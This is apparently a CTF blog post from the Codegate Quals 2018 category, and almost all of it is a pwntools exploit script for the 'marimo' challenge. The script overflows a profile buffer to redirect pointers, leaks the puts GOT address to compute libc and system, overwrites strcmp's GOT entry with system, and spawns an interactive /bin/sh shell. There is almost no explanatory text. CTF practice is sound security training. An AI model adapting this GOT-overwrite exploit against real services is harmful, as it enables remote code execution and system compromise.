[ Exploit Code ]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 | from pwn import * import time elf = ELF("./marimo") puts_plt = 0x400720 puts_got = 0x603018 puts_offset = 0x6f690 system_offset = 0x45390 strcmp_plt = 0x400770 strcmp_got = 0x603040 def show_me_the_marimo(name, profile): p.sendline("show me the marimo") print p.recvuntil(">>") p.sendline(name) print p.recvuntil(">>") p.sendline(profile) print p.recvuntil(">>") def leak(profile): time.sleep(2) p.sendline("V") print p.recvuntil(">>") p.sendline("0") print p.recvuntil(">>") p.sendline("M") print p.recvuntil(">>") p.sendline(profile) print p.recvuntil(">>") p.sendline("B") print p.recvuntil(">>") p.sendline("V") print p.recvuntil(">>") p.sendline("1") print p.recvuntil("name : ") return u64(p.recv(6).ljust(8, "\x00")) if __name__ == '__main__': p = remote('127.0.0.1', 8888) raw_input(">") print p.recvuntil(">>") show_me_the_marimo("AAAA", "AAAA") show_me_the_marimo("BBBB", "BBBB") payload = '' payload += "A"*40 payload += "B"*8 payload += p32(int(time.time())) payload += p32(0x100) payload += p64(puts_got) payload += p64(strcmp_got) puts_addr = leak(payload) print p.recvuntil(">>") libc_addr = puts_addr - puts_offset system_addr = libc_addr + system_offset print "[+] libc_addr = 0x%x" % libc_addr print "[+] system_addr = 0x%x" % system_addr #print p64(system_addr) #print p64(system_addr)[:-1] p.sendline("M") print p.recvuntil(">>") p.sendline(p64(system_addr)[:-1]) #p.sendline(p64(system_addr)) print p.recvuntil(">>") p.sendline("B") print p.recvuntil(">>") p.sendline("/bin/sh") p.interactive() | cs |
'CTF > Codegate 2018' 카테고리의 다른 글
| [Codegate Quals 2018] RedVelvet (0) | 2018.02.13 |
|---|---|
| [Codegate Quals 2018] Welcome to droid (0) | 2018.02.13 |
| [Codegate Quals 2018] BaskinRobins31 (0) | 2018.02.12 |